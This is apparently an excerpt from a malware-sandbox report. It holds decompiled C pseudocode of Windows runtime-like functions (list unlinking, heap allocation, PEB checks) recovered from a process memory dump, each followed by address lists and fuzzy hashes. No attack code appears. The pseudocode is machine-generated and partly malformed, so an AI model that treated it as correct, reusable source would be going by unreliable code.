				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
					L8:
					_push(3);
					asm("int 0x29");
				} else {
					 *_t27 = _t33;
					 *((intOrPtr*)(_t33 + 4)) = _t27;
					_t35 = 0x2f887e4;
					_t18 =  *0x2f887e0; // 0x0
					while(_t18 != 0) {
						_t43 = _t18 -  *0x2f85cd0; // 0xffffffff
						if(_t43 >= 0) {
							_t31 =  *0x2f887e4; // 0x0
							_t18 =  *_t31;
							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
								goto L8;
							} else {
								 *0x2f887e4 = _t18;
								 *((intOrPtr*)(_t18 + 4)) = _t35;
								L02E97055(_t31 + 0xfffffff8);
								_t24 =  *0x2f887e0; // 0x0
								_t18 = _t24 - 1;
								 *0x2f887e0 = _t18;
								continue;
							}
						}
						goto L9;
					}
				}
				L9:
				__eflags =  *0x2f85cd0;
				if( *0x2f85cd0 <= 0) {
					L02E97055(_t37);
				} else {
					_t30 = _t37 + 8;
					_t34 =  *0x2f887e8; // 0x0
					__eflags =  *_t34 - _t35;
					if( *_t34 != _t35) {
						goto L8;
					} else {
						 *_t30 = _t35;
						 *((intOrPtr*)(_t30 + 4)) = _t34;
						 *_t34 = _t30;
						 *0x2f887e8 = _t30;
						 *0x2f887e0 = _t18 + 1;
					}
				}
				 *(_t38 - 4) = 0xfffffffe;
				return E02EED0D1(L02F24320());
			}















              0x02f24257
              0x02f24257
              0x02f24257
              0x02f24259
              0x02f2425e
              0x02f24263
              0x02f24265
              0x02f24273
              0x02f24278
              0x02f2427c
              0x02f2427f
              0x02f24281
              0x02f24287
              0x02f242d7
              0x02f242d7
              0x02f242da
              0x02f2428d
              0x02f2428d
              0x02f2428f
              0x02f24292
              0x02f24297
              0x02f2429c
              0x02f242a0
              0x02f242a6
              0x02f242a8
              0x02f242ae
              0x02f242b3
              0x00000000
              0x02f242ba
              0x02f242ba
              0x02f242bf
              0x02f242c5
              0x02f242ca
              0x02f242cf
              0x02f242d0
              0x00000000
              0x02f242d0
              0x02f242b3
              0x00000000
              0x02f242a6
              0x02f2429c
              0x02f242dc
              0x02f242dc
              0x02f242e3
              0x02f24309
              0x02f242e5
              0x02f242e5
              0x02f242e8
              0x02f242ee
              0x02f242f0
              0x00000000
              0x02f242f2
              0x02f242f2
              0x02f242f4
              0x02f242f7
              0x02f242f9
              0x02f24300
              0x02f24300
              0x02f242f0
              0x02f2430e
              0x02f2431f

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: c39b8f8e4442c066f93394f8fbd1cf5dc08fb5c1b464868dbacc88fb95377b58
              • Instruction ID: 768be9f19e97f6959c04d7df6f22b7685f315ec695dc172b1a8b8da0c8b11668
              • Opcode Fuzzy Hash: c39b8f8e4442c066f93394f8fbd1cf5dc08fb5c1b464868dbacc88fb95377b58
              • Instruction Fuzzy Hash: 0D218870E80A18CFCB24DF65D900A28F7F2FB867D4BA4966AD2058B290DB759895CF10
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02EC2397 Relevance: .1, Instructions: 59COMMON
              Download Yara Rule
              C-Code - Quality: 29%
              			E02EC2397(intOrPtr _a4) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				void* _t19;
				void* _t25;
				void* _t26;
				intOrPtr _t27;
				void* _t28;
				void* _t29;

				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
				if( *0x2f8848c != 0) {
					L02EBFAD0(0x2f88610);
					if( *0x2f8848c == 0) {
						E02EBFA00(0x2f88610, _t19, _t27, 0x2f88610);
						goto L1;
					} else {
						_push(0);
						_push(_a4);
						_t26 = 4;
						_t29 = E02EC2581(0x2f88610, 0x2e750a0, _t26, _t27, _t28);
						E02EBFA00(0x2f88610, 0x2e750a0, _t27, 0x2f88610);
					}
				} else {
					L1:
					_t11 =  *0x2f88614; // 0x1
					if(_t11 == 0) {
						_t11 = E02ED4886(0x2e71088, 1, 0x2f88614);
					}
					_push(0);
					_push(_a4);
					_t25 = 4;
					_t29 = E02EC2581(0x2f88610, (_t11 << 4) + 0x2e75070, _t25, _t27, _t28);
				}
				if(_t29 != 0) {
					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
					 *((char*)(_t29 + 0x40)) = 0;
				}
				return _t29;
			}















              0x02ec23b0
              0x02ec23b6
              0x02ec2409
              0x02ec2415
              0x02f05ae9
              0x00000000
              0x02ec241b
              0x02ec241b
              0x02ec241d
              0x02ec2427
              0x02ec242e
              0x02ec2430
              0x02ec2430
              0x02ec23b8
              0x02ec23b8
              0x02ec23b8
              0x02ec23bf
              0x02ec23fc
              0x02ec23fc
              0x02ec23c1
              0x02ec23c3
              0x02ec23d0
              0x02ec23d8
              0x02ec23d8
              0x02ec23dc
              0x02ec23de
              0x02ec23e1
              0x02ec23e1
              0x02ec23ec

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: afbd550e83d6714f56a858490a9112a36c63421690fbe81d099236bd3aa3cbec
              • Instruction ID: 0c71713c5f7e5cba969cc81ebaff5cacc6423695fba1db7ab89e039f23c4046c
              • Opcode Fuzzy Hash: afbd550e83d6714f56a858490a9112a36c63421690fbe81d099236bd3aa3cbec
              • Instruction Fuzzy Hash: B7112B327C030567D720A67DAD90B67F68ABF50790F64E42EFF02AB190C6B0D802CB54
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02F146A7 Relevance: .1, Instructions: 59COMMON
              Download Yara Rule
              C-Code - Quality: 93%
              			E02F146A7(signed short* __ecx, unsigned int __edx, char* _a4) {
				signed short* _v8;
				unsigned int _v12;
				intOrPtr _v16;
				signed int _t22;
				signed char _t23;
				short _t32;
				void* _t38;
				char* _t40;

				_v12 = __edx;
				_t29 = 0;
				_v8 = __ecx;
				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t38 = L02EB4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
				if(_t38 != 0) {
					_t40 = _a4;
					 *_t40 = 1;
					E02EDF3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
					_t22 = _v12 >> 1;
					_t32 = 0x2e;
					 *((short*)(_t38 + _t22 * 2)) = _t32;
					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
					_t23 = E02ECD268(_t38, 1);
					asm("sbb al, al");
					 *_t40 =  ~_t23 + 1;
					L02EB77F0(_v16, 0, _t38);
				} else {
					 *_a4 = 0;
					_t29 = 0xc0000017;
				}
				return _t29;
			}











              0x02f146b7
              0x02f146ba
              0x02f146c5
              0x02f146c8
              0x02f146d0
              0x02f146d4
              0x02f146e6
              0x02f146e9
              0x02f146f4
              0x02f146ff
              0x02f14705
              0x02f14706
              0x02f1470c
              0x02f14713
              0x02f1471b
              0x02f14723
              0x02f14725
              0x02f146d6
              0x02f146d9
              0x02f146db
              0x02f146db
              0x02f14732

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
              • Instruction ID: b0300d317d01751afd3815685d000ec77de925992089250df30ce8c2bcfd95d7
              • Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
              • Instruction Fuzzy Hash: 6F11C272944208BBC7059F6C98809BEF7B9EF95344F1080AEF984CB351DA318D55D7A4
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02E9C962 Relevance: .1, Instructions: 57COMMON
              Download Yara Rule
              C-Code - Quality: 42%
              			E02E9C962(char __ecx) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t19;
				char _t22;
				intOrPtr _t26;
				intOrPtr _t27;
				char _t32;
				char _t34;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t38;
				signed int _t39;

				_t41 = (_t39 & 0xfffffff8) - 0xc;
				_v8 =  *0x2f8d360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
				_t34 = __ecx;
				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
					_t26 = 0;
					E02EAEEF0(0x2f870a0);
					_t29 =  *((intOrPtr*)(_t34 + 0x18));
					if(E02F1F625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
						L9:
						E02EAEB70(_t29, 0x2f870a0);
						_t19 = _t26;
						L2:
						_pop(_t35);
						_pop(_t37);
						_pop(_t27);
						return E02EDB640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
					}
					_t29 = _t34;
					_t26 = E02F1F1FC(_t34, _t32);
					if(_t26 < 0) {
						goto L9;
					}
					_t38 =  *0x2f870c0; // 0x0
					while(_t38 != 0x2f870c0) {
						_t22 =  *((intOrPtr*)(_t38 + 0x18));
						_t38 =  *_t38;
						_v12 = _t22;
						if(_t22 != 0) {
							_t29 = _t22;
							 *0x2f8b1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
							_v12();
						}
					}
					goto L9;
				}
				_t19 = 0;
				goto L2;
			}


















              0x02e9c96a
              0x02e9c974
              0x02e9c988
              0x02e9c98a
              0x02f07c9d
              0x02f07c9f
              0x02f07ca4
              0x02f07cae
              0x02f07cf0
              0x02f07cf5
              0x02f07cfa
              0x02e9c992
              0x02e9c996
              0x02e9c997
              0x02e9c998
              0x02e9c9a3
              0x02e9c9a3
              0x02f07cb0
              0x02f07cb7
              0x02f07cbb
              0x00000000
              0x00000000
              0x02f07cbd
              0x02f07ce8
              0x02f07cc5
              0x02f07cc8
              0x02f07cca
              0x02f07cd0
              0x02f07cd6
              0x02f07cde
              0x02f07ce4
              0x02f07ce4
              0x02f07cd0
              0x00000000
              0x02f07ce8
              0x02e9c990
              0x00000000

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 5fe05839262fa1e60fe347dbb3acef555b914a19488f3d32c3174d0b1ed42bd2
              • Instruction ID: cb50ee6cd03255f702bf6c06b6f6678e9fd677dae5deb0fd7e542440fb209660
              • Opcode Fuzzy Hash: 5fe05839262fa1e60fe347dbb3acef555b914a19488f3d32c3174d0b1ed42bd2
              • Instruction Fuzzy Hash: 1C1125327006469BE710BF28CC95A2BF7E2BF84694B204579FA4297690DB20FC10DBC1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02ED37F5 Relevance: .1, Instructions: 57COMMON
              Download Yara Rule
              C-Code - Quality: 87%
              			E02ED37F5(void* __ecx, intOrPtr* __edx) {
				void* __ebx;
				void* __edi;
				signed char _t6;
				intOrPtr _t13;
				intOrPtr* _t20;
				intOrPtr* _t27;
				void* _t28;
				intOrPtr* _t29;

				_t27 = __edx;
				_t28 = __ecx;
				if(__edx == 0) {
					E02EB2280(_t6, 0x2f88550);
				}
				_t29 = E02ED387E(_t28);
				if(_t29 == 0) {
					L6:
					if(_t27 == 0) {
						E02EAFFB0(0x2f88550, _t27, 0x2f88550);
					}
					if(_t29 == 0) {
						return 0xc0000225;
					} else {
						if(_t27 != 0) {
							goto L14;
						}
						L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
						goto L11;
					}
				} else {
					_t13 =  *_t29;
					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
						L13:
						_push(3);
						asm("int 0x29");
						L14:
						 *_t27 = _t29;
						L11:
						return 0;
					}
					_t20 =  *((intOrPtr*)(_t29 + 4));
					if( *_t20 != _t29) {
						goto L13;
					}
					 *_t20 = _t13;
					 *((intOrPtr*)(_t13 + 4)) = _t20;
					asm("btr eax, ecx");
					goto L6;
				}
			}











              0x02ed37fa
              0x02ed37fc
              0x02ed3805
              0x02ed3808
              0x02ed3808
              0x02ed3814
              0x02ed3818
              0x02ed3846
              0x02ed3848
              0x02ed384b
              0x02ed384b
              0x02ed3852
              0x00000000
              0x02ed3854
              0x02ed3856
              0x00000000
              0x00000000
              0x02ed3863
              0x00000000
              0x02ed3863
              0x02ed381a
              0x02ed381a
              0x02ed381f
              0x02ed386e
              0x02ed386e
              0x02ed3871
              0x02ed3873
              0x02ed3873
              0x02ed3868
              0x00000000
              0x02ed3868
              0x02ed3821
              0x02ed3826
              0x00000000
              0x00000000
              0x02ed3828
              0x02ed382a
              0x02ed3841
              0x00000000
              0x02ed3841

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b41df1bcf106292f8f2661f54eabcf2fbf0f944f7d88ead8250cb8577d2eff94
              • Instruction ID: bb54d582a7458379e4dbd736c4aab01a2f75e54b4c5cb2c24536f6717580e81d
              • Opcode Fuzzy Hash: b41df1bcf106292f8f2661f54eabcf2fbf0f944f7d88ead8250cb8577d2eff94
              • Instruction Fuzzy Hash: 7A0126BA9C16109BC3378B1A9900F27BBA7DF81B64725D0A9F9498B380C730C802CF81
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02EC002D Relevance: .1, Instructions: 55COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E02EC002D() {
				void* _t11;
				char* _t14;
				signed char* _t16;
				char* _t27;
				signed char* _t29;

				_t11 = E02EB7D50();
				_t27 = 0x7ffe0384;
				if(_t11 != 0) {
					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t14 = 0x7ffe0384;
				}
				_t29 = 0x7ffe0385;
				if( *_t14 != 0) {
					if(E02EB7D50() == 0) {
						_t16 = 0x7ffe0385;
					} else {
						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t16 & 0x00000040) != 0) {
						goto L18;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(E02EB7D50() != 0) {
						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					if( *_t27 != 0) {
						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						if(E02EB7D50() != 0) {
							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
						if(( *_t29 & 0x00000020) == 0) {
							goto L5;
						}
						L18:
						return 1;
					} else {
						L5:
						return 0;
					}
				}
			}








              0x02ec0032
              0x02ec0037
              0x02ec0043
              0x02f04b3a
              0x02ec0049
              0x02ec0049
              0x02ec0049
              0x02ec004e
              0x02ec0053
              0x02f04b48
              0x02f04b5a
              0x02f04b4a
              0x02f04b53
              0x02f04b53
              0x02f04b5f
              0x00000000
              0x02f04b61
              0x00000000
              0x02f04b61
              0x02ec0059
              0x02ec0059
              0x02ec0060
              0x02f04b6f
              0x02f04b6f
              0x02ec0069
              0x02f04b83
              0x00000000
              0x00000000
              0x02f04b90
              0x02f04b9b
              0x02f04b9b
              0x02f04ba4
              0x00000000
              0x00000000
              0x02f04baa
              0x00000000
              0x02ec006f
              0x02ec006f
              0x00000000
              0x02ec006f
              0x02ec0069

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
              • Instruction ID: d1277b4cce78d55c02f62d7b2b0c7a6a511e50076ddd871ff7fe5f1c167aa2f8
              • Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
              • Instruction Fuzzy Hash: CE118E76A516C0CFD7238768C685B7677D5EF427E8F1A54E0EF0087AD2D328C842D620
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02EA766D Relevance: .1, Instructions: 54COMMON
              Download Yara Rule
              C-Code - Quality: 94%
              			E02EA766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				char _v8;
				void* _t22;
				void* _t24;
				intOrPtr _t29;
				intOrPtr* _t30;
				void* _t42;
				intOrPtr _t47;

				_push(__ecx);
				_t36 =  &_v8;
				if(E02ECF3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
					L10:
					_t22 = 0;
				} else {
					_t24 = _v8 + __ecx;
					_t42 = _t24;
					if(_t24 < __ecx) {
						goto L10;
					} else {
						if(E02ECF3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
							goto L10;
						} else {
							_t29 = _v8 + _t42;
							if(_t29 < _t42) {
								goto L10;
							} else {
								_t47 = _t29;
								_t30 = _a16;
								if(_t30 != 0) {
									 *_t30 = _t47;
								}
								if(_t47 == 0) {
									goto L10;
								} else {
									_t22 = L02EB4620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
								}
							}
						}
					}
				}
				return _t22;
			}










              0x02ea7672
              0x02ea767f
              0x02ea7689
              0x02ea76de
              0x02ea76de
              0x02ea768b
              0x02ea7691
              0x02ea7693
              0x02ea7697
              0x00000000
              0x02ea7699
              0x02ea76a8
              0x00000000
              0x02ea76aa
              0x02ea76ad
              0x02ea76b1
              0x00000000
              0x02ea76b3
              0x02ea76b3
              0x02ea76b5
              0x02ea76ba
              0x02ea76bc
              0x02ea76bc
              0x02ea76c0
              0x00000000
              0x02ea76c2
              0x02ea76ce
              0x02ea76ce
              0x02ea76c0
              0x02ea76b1
              0x02ea76a8
              0x02ea7697
              0x02ea76d9

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
              • Instruction ID: 83c5ff5a434ecdad22612ad4699d083993aa45599759b77ddee748efbf0aeeea
              • Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
              • Instruction Fuzzy Hash: 4501B132790518ABC720DE6ECD60F9FB6AEEFC4764B249164B908CF241DA30EC0187A0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02E99080 Relevance: .1, Instructions: 53COMMON
              Download Yara Rule
              C-Code - Quality: 69%
              			E02E99080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr* _t51;
				intOrPtr _t59;
				signed int _t64;
				signed int _t67;
				signed int* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t82;
				intOrPtr* _t84;
				void* _t85;
				intOrPtr* _t87;
				void* _t94;
				signed int _t95;
				intOrPtr* _t97;
				signed int _t99;
				signed int _t102;
				void* _t104;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t97 = __ecx;
				_t102 =  *(__ecx + 0x14);
				if((_t102 & 0x02ffffff) == 0x2000000) {
					_t102 = _t102 | 0x000007d0;
				}
				_t48 =  *[fs:0x30];
				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
					_t102 = _t102 & 0xff000000;
				}
				_t80 = 0x2f885ec;
				E02EB2280(_t48, 0x2f885ec);
				_t51 =  *_t97 + 8;
				if( *_t51 != 0) {
					L6:
					return E02EAFFB0(_t80, _t97, _t80);
				} else {
					 *(_t97 + 0x14) = _t102;
					_t84 =  *0x2f8538c; // 0x77ad6888
					if( *_t84 != 0x2f85388) {
						_t85 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x2c);
						_push(0x2f6f6e8);
						E02EED0E8(0x2f885ec, _t97, _t102);
						 *((char*)(_t104 - 0x1d)) = 0;
						_t99 =  *(_t104 + 8);
						__eflags = _t99;
						if(_t99 == 0) {
							L13:
							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
							if(__eflags == 0) {
								E02F688F5(_t80, _t85, 0x2f85388, _t99, _t102, __eflags);
							}
						} else {
							__eflags = _t99 -  *0x2f886c0; // 0x4007b0
							if(__eflags == 0) {
								goto L13;
							} else {
								__eflags = _t99 -  *0x2f886b8; // 0x0
								if(__eflags == 0) {
									goto L13;
								} else {
									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
									__eflags =  *((char*)(_t59 + 0x28));
									if( *((char*)(_t59 + 0x28)) == 0) {
										E02EB2280(_t99 + 0xe0, _t99 + 0xe0);
										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
										__eflags =  *((char*)(_t99 + 0xe5));
										if(__eflags != 0) {
											E02F688F5(0x2f885ec, _t85, 0x2f85388, _t99, _t102, __eflags);
										} else {
											__eflags =  *((char*)(_t99 + 0xe4));
											if( *((char*)(_t99 + 0xe4)) == 0) {
												 *((char*)(_t99 + 0xe4)) = 1;
												_push(_t99);
												_push( *((intOrPtr*)(_t99 + 0x24)));
												E02EDAFD0();
											}
											while(1) {
												_t71 = _t99 + 8;
												 *(_t104 - 0x2c) = _t71;
												_t80 =  *_t71;
												_t95 = _t71[1];
												 *(_t104 - 0x28) = _t80;
												 *(_t104 - 0x24) = _t95;
												while(1) {
													L19:
													__eflags = _t95;
													if(_t95 == 0) {
														break;
													}
													_t102 = _t80;
													 *(_t104 - 0x30) = _t95;
													 *(_t104 - 0x24) = _t95 - 1;
													asm("lock cmpxchg8b [edi]");
													_t80 = _t102;
													 *(_t104 - 0x28) = _t80;
													 *(_t104 - 0x24) = _t95;
													__eflags = _t80 - _t102;
													_t99 =  *(_t104 + 8);
													if(_t80 != _t102) {
														continue;
													} else {
														__eflags = _t95 -  *(_t104 - 0x30);
														if(_t95 !=  *(_t104 - 0x30)) {
															continue;
														} else {
															__eflags = _t95;
															if(_t95 != 0) {
																_t74 = 0;
																 *(_t104 - 0x34) = 0;
																_t102 = 0;
																__eflags = 0;
																while(1) {
																	 *(_t104 - 0x3c) = _t102;
																	__eflags = _t102 - 3;
																	if(_t102 >= 3) {
																		break;
																	}
																	__eflags = _t74;
																	if(_t74 != 0) {
																		L49:
																		_t102 =  *_t74;
																		__eflags = _t102;
																		if(_t102 != 0) {
																			_t102 =  *(_t102 + 4);
																			__eflags = _t102;
																			if(_t102 != 0) {
																				 *0x2f8b1e0(_t74, _t99);
																				 *_t102();
																			}
																		}
																		do {
																			_t71 = _t99 + 8;
																			 *(_t104 - 0x2c) = _t71;
																			_t80 =  *_t71;
																			_t95 = _t71[1];
																			 *(_t104 - 0x28) = _t80;
																			 *(_t104 - 0x24) = _t95;
																			goto L19;
																		} while (_t74 == 0);
																		goto L49;
																	} else {
																		_t82 = 0;
																		__eflags = 0;
																		while(1) {
																			 *(_t104 - 0x38) = _t82;
																			__eflags = _t82 -  *0x2f884c0;
																			if(_t82 >=  *0x2f884c0) {
																				break;
																			}
																			__eflags = _t74;
																			if(_t74 == 0) {
																				_t77 = E02F69063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
																				__eflags = _t77;
																				if(_t77 == 0) {
																					_t74 = 0;
																					__eflags = 0;
																				} else {
																					_t74 = _t77 + 0xfffffff4;
																				}
																				 *(_t104 - 0x34) = _t74;
																				_t82 = _t82 + 1;
																				continue;
																			}
																			break;
																		}
																		_t102 = _t102 + 1;
																		continue;
																	}
																	goto L20;
																}
																__eflags = _t74;
															}
														}
													}
													break;
												}
												L20:
												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
												 *((char*)(_t99 + 0xe5)) = 1;
												 *((char*)(_t104 - 0x1d)) = 1;
												goto L21;
											}
										}
										L21:
										 *(_t104 - 4) = 0xfffffffe;
										E02E9922A(_t99);
										_t64 = E02EB7D50();
										__eflags = _t64;
										if(_t64 != 0) {
											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
										} else {
											_t67 = 0x7ffe0386;
										}
										__eflags =  *_t67;
										if( *_t67 != 0) {
											_t67 = E02F68B58(_t99);
										}
										__eflags =  *((char*)(_t104 - 0x1d));
										if( *((char*)(_t104 - 0x1d)) != 0) {
											__eflags = _t99 -  *0x2f886c0; // 0x4007b0
											if(__eflags != 0) {
												__eflags = _t99 -  *0x2f886b8; // 0x0
												if(__eflags == 0) {
													_t94 = 0x2f886bc;
													_t87 = 0x2f886b8;
													goto L27;
												} else {
													__eflags = _t67 | 0xffffffff;
													asm("lock xadd [edi], eax");
													if(__eflags == 0) {
														E02E99240(_t80, _t99, _t99, _t102, __eflags);
													}
												}
											} else {
												_t94 = 0x2f886c4;
												_t87 = 0x2f886c0;
												L27:
												E02EC9B82(_t80, _t87, _t94, _t99, _t102, __eflags);
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						return E02EED130(_t80, _t99, _t102);
					} else {
						 *_t51 = 0x2f85388;
						 *((intOrPtr*)(_t51 + 4)) = _t84;
						 *_t84 = _t51;
						 *0x2f8538c = _t51;
						goto L6;
					}
				}
			}




















              0x02e99082
              0x02e99083
              0x02e99084
              0x02e99085
              0x02e99087
              0x02e99096
              0x02e99098
              0x02e99098
              0x02e9909e
              0x02e990a8
              0x02e990e7
              0x02e990e7
              0x02e990aa
              0x02e990b0
              0x02e990b7
              0x02e990bd
              0x02e990dd
              0x02e990e6
              0x02e990bf
              0x02e990bf
              0x02e990c7
              0x02e990cf
              0x02e990f1
              0x02e990f2
              0x02e990f4
              0x02e990f5
              0x02e990f6
              0x02e990f7
              0x02e990f8
              0x02e990f9
              0x02e990fa
              0x02e990fb
              0x02e990fc
              0x02e990fd
              0x02e990fe
              0x02e990ff
              0x02e99100
              0x02e99102
              0x02e99107
              0x02e9910c
              0x02e99110
              0x02e99113
              0x02e99115
              0x02e99136
              0x02e9913f
              0x02e99143
              0x02ef37e4
              0x02ef37e4
              0x02e99117
              0x02e99117
              0x02e9911d
              0x00000000
              0x02e9911f
              0x02e9911f
              0x02e99125
              0x00000000
              0x02e99127
              0x02e9912d
              0x02e99130
              0x02e99134
              0x02e99158
              0x02e9915d
              0x02e99161
              0x02e99168
              0x02ef3715
              0x02e9916e
              0x02e9916e
              0x02e99175
              0x02e99177
              0x02e9917e
              0x02e9917f
              0x02e99182
              0x02e99182
              0x02e99187
              0x02e99187
              0x02e9918a
              0x02e9918d
              0x02e9918f
              0x02e99192
              0x02e99195
              0x02e99198
              0x02e99198
              0x02e99198
              0x02e9919a
              0x00000000
              0x00000000
              0x02ef371f
              0x02ef3721
              0x02ef3727
              0x02ef372f
              0x02ef3733
              0x02ef3735
              0x02ef3738
              0x02ef373b
              0x02ef373d
              0x02ef3740
              0x00000000
              0x02ef3746
              0x02ef3746
              0x02ef3749
              0x00000000
